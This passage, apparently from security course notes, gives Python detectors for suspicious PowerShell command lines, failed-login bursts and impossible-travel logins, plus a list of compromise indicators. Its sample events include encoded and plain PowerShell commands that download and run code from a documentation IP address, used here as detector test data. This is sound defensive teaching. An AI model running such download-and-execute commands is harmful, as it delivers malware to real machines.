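    except (ValueError, UnicodeDecodeError):
        return None


def analyze(cmdline: str) -> dict:
    """Score one process-creation command line. The encoded blob is removed
    from the wrapper before matching so its random-looking text cannot trip
    the regexes; the decoded payload is matched separately."""
    indicators = set()
    decoded = None
    wrapper = cmdline
    m = ENCODED_ARG.search(cmdline)
    if m:
        indicators.add("encoded_command")
        wrapper = cmdline.replace(m.group(1), "<blob>")
        decoded = decode_powershell(m.group(1))
    for text in (wrapper, decoded or ""):
        for name, pattern in SUSPICIOUS_PATTERNS.items():
            if pattern.search(text):
                indicators.add(name)
    n = len(indicators)
    severity = "none" if n == 0 else "low" if n == 1 else "medium" if n <= 3 else "high"
    return {"cmdline": cmdline, "decoded": decoded, "indicators": sorted(indicators), "severity": severity}


# Constructed command lines as they would appear in Sysmon Event ID 1 or
# Windows Event ID 4688 CommandLine fields; 203.0.113.5 is a documentation address.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a.ps1')"
SAMPLE_EVENTS = [
    r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1",
    f"powershell.exe -nop -w hidden -enc {encode_powershell(CRADLE)}",
    "powershell.exe Get-Service | Where-Object Status -eq Running",
    'powershell -ExecutionPolicy Bypass -Command "Invoke-WebRequest http://203.0.113.5/x -OutFile x.exe; Start-Process x.exe"',
]


def analyze_all(events=SAMPLE_EVENTS) -> list:
    return [analyze(e) for e in events]


if __name__ == "__main__":
    for r in analyze_all():
        print(f"[{r['severity']:6}] {r['indicators']}")
        if r["decoded"]:
            print(f"         decoded: {r['decoded']}")
```

The scheduled backup script with -NoProfile scores low on purpose: a single wrapper flag is normal administration, and it is the combination of a hidden window, no profile, an encoded argument and a download cradle inside the decoded text that marks the second line as hostile. With Script Block Logging enabled the same payload text would also appear in Event ID 4104, already decoded, which is why that log is the better source when it is available.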

58:

1. Account Lockouts:

Indicator:

Multiple failed login attempts triggering user account lockouts.

Significance:

Credential theft or brute force attacks may be in progress.

Unusual surge in locked accounts across the enterprise network.

2. Concurrent Session Utilization:

Indicator:

Single user account having multiple simultaneous sessions.

Significance:

Potential hijacking of user accounts for malicious activities.

Especially concerning if sessions are from various geographic locations.

3. Blocked Content:

Indicator:

Increase in alerts for blocking known malicious content.

Significance:

Possible penetration of the system by malware.

Security tools are actively blocking malicious files or links.

4. Impossible Travel:

Indicator:

User account accessed from geographically separated locations in a very short time.

Significance:

Indication of compromised user accounts.

Often a result of successful malware attacks harvesting user credentials.


5. Resource Consumption:

Indicator:

Unusual spikes in CPU, memory, or network bandwidth utilization.

Significance:

Presence of malware, especially Cryptominers, botnets, or worms.

High resource consumption leading to system slowdowns.

6. Resource Inaccessibility:

Indicator:

Files or critical systems becoming inaccessible, often with a ransom demand.

Significance:

Clear sign of a ransomware-based malware attack.

Files encrypted, demanding payment for decryption.

7. Out-of-Cycle Logging:

Indicator:

System logs generated at odd hours or during inactive periods.

Significance:

Potential indication of unauthorized data transfers or system modifications.

Review logs regularly to detect such infections.

8. Missing Logs:

Indicator:

Large gaps in logs or logs cleared without authorized reason.

Significance:

Threat actor attempting to hide their tracks after a successful breach.

Indicates malicious activity or a malware attack.

9. Published or Documented Attacks:

Indicator:

Reports by cybersecurity researchers or reporters highlighting your organization's network infection.

Significance:

External confirmation of a malware-based attack.

A clear indication that your organization has been targeted.
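Two of these indicators, account lockouts and impossible travel, are straightforward to compute from an authentication log. The Python below is an added example, not course material: the events are constructed, the latitude/longitude pairs stand in for a GeoIP lookup of the source address, and the thresholds (10 failures in 5 minutes; 900 km/h, roughly airliner speed, with a 100 km floor to ignore GeoIP noise) are assumptions to tune for the environment.

```python
import math
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed authentication events: (timestamp, user, outcome, source_ip, lat, lon).
# The coordinates stand in for a GeoIP lookup of the source address.
EVENTS = [
    ("2024-03-01T09:00:00", "alice", "success", "198.51.100.20", 40.7128, -74.0060),  # New York
    ("2024-03-01T09:30:00", "alice", "success", "203.0.113.77", 51.5074, -0.1278),    # London, 30 min later
    ("2024-03-01T08:00:00", "bob", "success", "198.51.100.30", 41.8781, -87.6298),    # Chicago
    ("2024-03-01T12:00:00", "bob", "success", "198.51.100.31", 39.7392, -104.9903),   # Denver, 4 h later
    ("2024-03-01T07:00:00", "dave", "failure", "198.51.100.40", 0.0, 0.0),
    ("2024-03-01T11:00:00", "dave", "failure", "198.51.100.40", 0.0, 0.0),
    ("2024-03-01T15:00:00", "dave", "failure", "198.51.100.40", 0.0, 0.0),
] + [
    # carol: twelve failures in under two minutes from one address
    (f"2024-03-01T10:{i // 6:02d}:{(i % 6) * 10:02d}", "carol", "failure", "198.51.100.9", 0.0, 0.0)
    for i in range(12)
]


def haversine_km(lat1, lon1, lat2, lon2) -> float:
    """Great-circle distance between two points, in kilometres."""
    p1, p2 = math.radians(lat1), math.radians(lat2)
    dphi = p2 - p1
    dlambda = math.radians(lon2 - lon1)
    a = math.sin(dphi / 2) ** 2 + math.cos(p1) * math.cos(p2) * math.sin(dlambda / 2) ** 2
    return 2 * 6371.0 * math.asin(math.sqrt(a))


def failed_login_bursts(events, threshold: int = 10, window_minutes: int = 5) -> dict:
    """Account-lockout indicator: {user: peak failures inside the window}
    for every user who reached `threshold` failures within `window_minutes`."""
    window = timedelta(minutes=window_minutes)
    per_user = defaultdict(list)
    for ts, user, outcome, *_ in events:
        if outcome == "failure":
            per_user[user].append(datetime.fromisoformat(ts))
    bursts = {}
    for user, times in per_user.items():
        times.sort()
        recent = deque()
        for t in times:
            recent.append(t)
            while t - recent[0] > window:
                recent.popleft()
            if len(recent) >= threshold:
                bursts[user] = max(len(recent), bursts.get(user, 0))
    return bursts


def impossible_travel(events, max_kmh: float = 900.0, min_km: float = 100.0) -> list:
    """Impossible-travel indicator: consecutive successful logins by one user
    whose implied speed exceeds `max_kmh`. `min_km` suppresses GeoIP noise
    between nearby locations."""
    per_user = defaultdict(list)
    for ts, user, outcome, ip, lat, lon in events:
        if outcome == "success":
            per_user[user].append((datetime.fromisoformat(ts), ip, lat, lon))
    findings = []
    for user, logins in per_user.items():
        logins.sort()
        for (t1, ip1, la1, lo1), (t2, ip2, la2, lo2) in zip(logins, logins[1:]):
            km = haversine_km(la1, lo1, la2, lo2)
            if km < min_km:
                continue
            hours = (t2 - t1).total_seconds() / 3600
            kmh = km / hours if hours > 0 else float("inf")
            if kmh > max_kmh:
                findings.append({"user": user, "from": ip1, "to": ip2, "km": round(km), "kmh": round(kmh)})
    return findings


if __name__ == "__main__":
    print("lockout bursts:", failed_login_bursts(EVENTS))
    for f in impossible_travel(EVENTS):
        print(f"{f['user']}: {f['km']} km from {f['from']} to {f['to']} implies {f['kmh']} km/h")
```

Bob's Chicago-to-Denver pair is roughly 1,480 km in four hours, an ordinary flight, so it is not reported; Alice's New York-to-London pair covers about 5,570 km in thirty minutes and is. Dave's three spread-out failures never reach the burst threshold, so only Carol's twelve rapid failures appear as a lockout-style indicator. Both checks are per-user; the surge across many accounts that the lesson mentions is the same logic aggregated over the whole enterprise.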
